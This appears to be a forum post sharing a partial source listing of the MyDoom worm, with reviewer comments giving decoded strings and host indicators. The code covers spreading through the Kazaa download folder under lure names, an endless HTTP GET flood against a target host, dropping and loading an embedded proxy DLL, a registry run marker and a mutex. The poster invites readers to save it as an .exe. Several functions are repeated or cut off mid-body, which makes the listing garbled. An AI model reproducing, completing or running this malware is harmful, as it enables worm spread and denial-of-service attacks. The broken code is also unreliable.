Source code of the dangerous computer virus, "MyDoom"

                                    

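OK @TheLonelyCone, here you go with your 'Favorited Virus' info. MyDoom was called MyDom or MyDomain. What follows is a partial excerpt: its strings are ROT13-encoded, and several functions are cut off or repeated.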

/*
 * Lure base names for the copy that kazaa_spread() places in the Kazaa
 * download folder. Every entry is ROT13-encoded and is decoded at run time.
 *
 * Decoded, for detection and triage: winamp5, icq2004-final,
 * activation_crack, strip-girl-2.0b, dcom_patches, rootkitXP,
 * office_crack, nuke2004.
 *
 * NOTE(review): because of the comma the listing itself flags as missing,
 * the fourth and fifth literals are concatenated by the compiler, so the
 * array holds seven entries and one decoded name is
 * "strip-girl-2.0bdcom_patches".
 */
char *kazaa_names[] = {
"jvanzc5",
"vpd2004-svany",
"npgvingvba_penpx",
"fgevc-tvey-2.0o" /* missed comma in the original version */
"qpbz_cngpurf",
"ebbgxvgKC",
"bssvpr_penpx",
"ahxr2004"
};
/*
 * Copies `file` into the directory named by the Kazaa download-folder
 * registry value, under a randomly chosen lure name from kazaa_names with
 * one of the extensions exe, scr, pif or bat.
 *
 * Host artifacts visible in this function:
 *   - read of HKEY_CURRENT_USER\Software\Kazaa\Transfer, value "DlDir0"
 *   - a new file <download dir>\<lure name>.{exe,scr,pif,bat}
 *
 * The function returns silently when the key or value is missing or the
 * value is empty.
 *
 * NOTE(review): the listing has no closing brace for this function, and the
 * RegOpenKeyEx call is split mid-identifier ("&hKe" / "y") by the page's
 * line wrapping; the fragment is not compilable as shown.
 */
static void kazaa_spread(char *file)
{
/* Entry count is taken from the array itself, so it follows the literal
 * concatenation caused by the missing comma in kazaa_names. */
int kazaa_names_cnt = sizeof(kazaa_names) / sizeof(kazaa_names[0]);
char kaza[256];
DWORD kazalen=sizeof(kaza);
HKEY hKey;
char key_path[64], key_val[32];
// Software\Kazaa\Transfer
rot13(key_path, "Fbsgjner\\Xnmnn\\Genafsre");
rot13(key_val, "QyQve0"); // "DlDir0"
// Get the path to Kazaa from the registry
ZeroMemory(kaza, kazalen);
if
(RegOpenKeyEx(HKEY_CURRENT_USER,key_path,0,KEY_QUERY_VALUE,&hKe
y)) return;
if (RegQueryValueEx(hKey, key_val, 0, NULL, (PBYTE)kaza, &kazalen))
return;
RegCloseKey(hKey);
if (kaza[0] == 0) return;
/* Normalise the directory so that it ends in a single backslash. */
if (kaza[lstrlen(kaza)-1] == '/') kaza[lstrlen(kaza)-1] = '\\';
if (kaza[lstrlen(kaza)-1] != '\\') lstrcat(kaza, "\\");
/* Decode one randomly selected lure name directly onto the end of the path. */
rot13(kaza+lstrlen(kaza), kazaa_names[xrand16() % kazaa_names_cnt]);
lstrcat(kaza, ".");
/* Extension weights out of six: exe 2, scr 2, pif 1, bat 1. Each extension
 * is appended in two pieces; presumably this keeps the full extension
 * string out of the binary's string table (assumption, not shown here). */
switch (xrand16() % 6) {
case 0: case 1: lstrcat(kaza, "ex"); lstrcat(kaza, "e"); break;
case 2: case 3: lstrcat(kaza, "sc"); lstrcat(kaza, "r"); break;
case 4: lstrcat(kaza, "pi"); lstrcat(kaza, "f"); break;
default: lstrcat(kaza, "ba"); lstrcat(kaza, "t"); break;
}
/* Third argument TRUE is bFailIfExists: an existing file of the same name
 * is left untouched. The result of CopyFile is not checked. */
CopyFile(file,kaza,TRUE);
/*
 * Thread routine that repeatedly sends one fixed HTTP request to the socket
 * address passed in `pv`.
 *
 * The request is stored ROT13-encoded and decoded into `buf`; per the
 * listing's own comment it is a bare "GET / HTTP/1.1" with a single Host
 * header, where the host comes from the SCO_SITE_ROT13 macro (defined
 * outside this excerpt). For network detection the visible traits are: an
 * endless series of short-lived connections to one address, each carrying
 * the same minimal request with no other headers.
 *
 * pv:      pointer to a struct sockaddr_in; NULL makes the thread exit at once.
 * returns: 0, reached only through the NULL-argument path, since the send
 *          loop has no exit.
 *
 * NOTE(review): the string literals below contain real line breaks; these
 * look like "\r\n" escapes lost when the page was extracted - confirm
 * against an authoritative copy. As shown the literals are not valid C.
 */
static DWORD _stdcall scodos_th(LPVOID pv)
{
struct sockaddr_in addr;
char buf[512];
int sock;
rot13(buf,
/*
* "GET / HTTP/1.1

"
* "Host: www.sco.com

"
* "

";
*/
"TRG / UGGC/1.1

"
"Ubfg: " SCO_SITE_ROT13 "

"
"

");
/* Runs below normal priority. */
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_BELOW_NORMAL);
if (pv == NULL) goto ex;
/* Take a private copy of the target address. */
addr = *(struct sockaddr_in *)pv;
for (;;) {
/* connect_tv is defined elsewhere; the second argument is presumably a
 * timeout in seconds - TODO confirm. A return of 0 is treated as failure. */
sock = connect_tv(&addr, 8);
if (sock != 0) {
send(sock, buf, lstrlen(buf), 0);
/* 300 ms pause before closing; no response is read. */
Sleep(300);
closesocket(sock);
}
}
ex: ExitThread(0);
return 0;
}
/*
 * Writes the embedded `xproxy_data` blob to disk as "shimgapi.dll" and loads
 * it into the current process.
 *
 * Two locations are tried in order: the Windows system directory
 * (GetSystemDirectory), then the temporary directory (GetTempPath). The
 * chosen path is stored in sync->xproxy_path.
 *
 * sync->xproxy_state values set here:
 *   0 - nothing written (initial value, and the result if both paths fail)
 *   1 - file written, not yet loaded (transient)
 *   2 - LoadLibrary was called, or the file already existed and could not
 *       be opened for writing
 *
 * Host artifacts: a file named shimgapi.dll in the system directory or the
 * temp directory, and that module loaded in the process.
 *
 * NOTE(review): xproxy_data and decrypt1_to_file are defined outside this
 * excerpt; their contents and format are not visible here.
 */
void payload_xproxy(struct sync_t *sync)
{
char fname[20], fpath[MAX_PATH+20];
HANDLE hFile;
int i;
rot13(fname, "fuvztncv.qyy"); /* "shimgapi.dll" */
sync->xproxy_state = 0;
for (i=0; i<2; i++) {
/* Pass 0: system directory. Pass 1: temp directory. */
if (i == 0)
GetSystemDirectory(fpath, sizeof(fpath));
else
GetTempPath(sizeof(fpath), fpath);
if (fpath[0] == 0) continue;
if (fpath[lstrlen(fpath)-1] != '\\') lstrcat(fpath, "\\");
lstrcat(fpath, fname);
/* CREATE_ALWAYS: an existing file at this path is overwritten if it can
 * be opened. */
hFile = CreateFile(fpath, GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {
/* Open failed. If the file does not exist either, try the next
 * directory; if it does exist, record it as state 2 without writing or
 * loading - presumably it is held by an earlier instance (assumption). */
if (GetFileAttributes(fpath) ==
INVALID_FILE_ATTRIBUTES)
continue;
sync->xproxy_state = 2;
lstrcpy(sync->xproxy_path, fpath);
break;
}
decrypt1_to_file(xproxy_data, sizeof(xproxy_data), hFile);
CloseHandle(hFile);
sync->xproxy_state = 1;
lstrcpy(sync->xproxy_path, fpath);
break;
}
/* Only a freshly written file is loaded; the LoadLibrary result is not
 * checked before the state moves to 2. */
if (sync->xproxy_state == 1) {
LoadLibrary(sync->xproxy_path);
sync->xproxy_state = 2;
}
}
/*
 * Sets sync->first_run according to whether a marker registry key already
 * exists, and creates the marker when it does not.
 *
 * Marker key (ROT13-decoded, per the listing's comment):
 *   Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\Version
 * It is looked up under HKEY_LOCAL_MACHINE first, then HKEY_CURRENT_USER.
 *
 * If the key opens in either hive, first_run stays 0 and the function
 * returns. Otherwise first_run becomes 1 and creation is attempted in both
 * hives; a failure in one hive (for example HKLM without sufficient rights)
 * is ignored.
 *
 * Host artifact: the presence of this key in either hive is the marker this
 * code leaves behind. The page repeats this function verbatim further down.
 */
void sync_check_frun(struct sync_t *sync)
{
HKEY k;
DWORD disp;
char i, tmp[128];
/*
"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\Version" */
rot13(tmp,
"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\PbzQyt32\\Irefvba");
sync->first_run = 0;
/* Probe: i == 0 checks HKLM, i == 1 checks HKCU. */
for (i=0; i<2; i++)
if (RegOpenKeyEx((i == 0) ? HKEY_LOCAL_MACHINE :
HKEY_CURRENT_USER,
tmp, 0, KEY_READ, &k) == 0) {
RegCloseKey(k);
return;
}
sync->first_run = 1;
/* Create the marker in both hives; no value is written under the key. */
for (i=0; i<2; i++)
if (RegCreateKeyEx((i == 0) ? HKEY_LOCAL_MACHINE :
HKEY_CURRENT_USER,
tmp, 0, NULL, 0, KEY_WRITE, NULL, &k, &disp) == 0)
RegCloseKey(k);
}
/*
 * Single-instance check through a named mutex.
 *
 * Creates, or opens if it already exists, the mutex "SwebSipcSmtxS0" (stored
 * ROT13-encoded) and requests initial ownership. The returned handle is
 * discarded, and `sync` is not used.
 *
 * returns: 1 if the mutex already existed (GetLastError() reports
 *          ERROR_ALREADY_EXISTS), otherwise 0.
 *
 * Host artifact: a named mutex with this exact name in the session is an
 * indicator of a running instance. The page repeats this function verbatim
 * further down.
 */
int sync_mutex(struct sync_t *sync)
{
char tmp[64];
rot13(tmp, "FjroFvcpFzgkF0"); /* "SwebSipcSmtxS0" */
CreateMutex(NULL, TRUE, tmp);
return (GetLastError() == ERROR_ALREADY_EXISTS) ? 1 : 0;
}
void sync_install(struct sync_t *sync)
{
char fname[20], fpath[MAX_PATH+20], selfpath[MAX_PATH];
HANDLE hFile;
int i;
rot13(fname, "gnfxzba.rkr"); /* "taskmon.exe" */
GetModuleFileName(NULL, selfpath, MAX_PATH);
lstrcpy(sync->sync_instpath, selfpath);
/*
 * Second copy of sync_check_frun on this page; an identical definition
 * appears earlier in the listing, so this looks like a pasting artifact.
 *
 * Sets sync->first_run to 0 when the marker key
 *   Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\Version
 * can be opened under HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER. Otherwise it
 * sets first_run to 1 and attempts to create the key in both hives,
 * ignoring failures.
 *
 * Host artifact: the presence of this key in either hive.
 */
void sync_check_frun(struct sync_t *sync)
{
HKEY k;
DWORD disp;
char i, tmp[128];
/*
"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\Version" */
rot13(tmp,
"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\PbzQyt32\\Irefvba");
sync->first_run = 0;
/* Probe: i == 0 checks HKLM, i == 1 checks HKCU. */
for (i=0; i<2; i++)
if (RegOpenKeyEx((i == 0) ? HKEY_LOCAL_MACHINE :
HKEY_CURRENT_USER,
tmp, 0, KEY_READ, &k) == 0) {
RegCloseKey(k);
return;
}
sync->first_run = 1;
/* Create the marker in both hives; no value is written under the key. */
for (i=0; i<2; i++)
if (RegCreateKeyEx((i == 0) ? HKEY_LOCAL_MACHINE :
HKEY_CURRENT_USER,
tmp, 0, NULL, 0, KEY_WRITE, NULL, &k, &disp) == 0)
RegCloseKey(k);
}
/*
 * Second copy of sync_mutex on this page; an identical definition appears
 * earlier in the listing.
 *
 * Creates or opens the named mutex "SwebSipcSmtxS0" (stored ROT13-encoded)
 * and returns 1 if it already existed, otherwise 0. The handle is discarded
 * and `sync` is not used. The mutex name is a host indicator of a running
 * instance.
 */
int sync_mutex(struct sync_t *sync)
{
char tmp[64];
rot13(tmp, "FjroFvcpFzgkF0"); /* "SwebSipcSmtxS0" */
CreateMutex(NULL, TRUE, tmp);
return (GetLastError() == ERROR_ALREADY_EXISTS) ? 1 : 0;
}
void sync_install(struct sync_t *sync)
{
char fname[20], fpath[MAX_PATH+20], selfpath[MAX_PATH];
HANDLE hFile;
int i;
rot13(fname, "gnfxzba.rkr"); /* "taskmon.exe" */
GetModuleFileName(NULL, selfpath, MAX_PATH);
lstrcpy(sync->sync_instpath, selfpath);

save with .exe (executable) extension.
GG I win
